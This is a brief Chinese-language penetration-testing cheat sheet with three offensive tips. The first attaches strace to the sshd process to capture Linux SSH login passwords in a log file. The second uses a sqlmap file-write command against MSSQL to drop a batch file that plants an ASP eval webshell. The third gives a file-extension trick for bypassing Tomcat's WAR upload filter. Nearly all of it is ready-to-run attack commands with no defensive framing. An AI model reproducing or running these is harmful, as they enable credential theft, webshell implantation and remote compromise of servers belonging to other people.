1.如何窃取Linux登录的账号密码
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &)
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log
2.不出网的Mssql注入(中文目录写webshell)
上传一个bat文件并执行
python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:\users\public\music\ashell.bat
bat的内容为
echo ^<%%eval request("aaaaaa")%%^> >D:\\张三的马赛克\\Content\\images\\logo1.asp
3.Tomcat后台上传WAR包过滤该如何绕过
将文件后缀修改为xxx.w\\\ar
https://mp.weixin.qq.com/s?__biz=Mzg3NDk3NzMwNw==&mid=2247483836&idx=1&sn=f899bf5f453cff4517e8815b9ea16747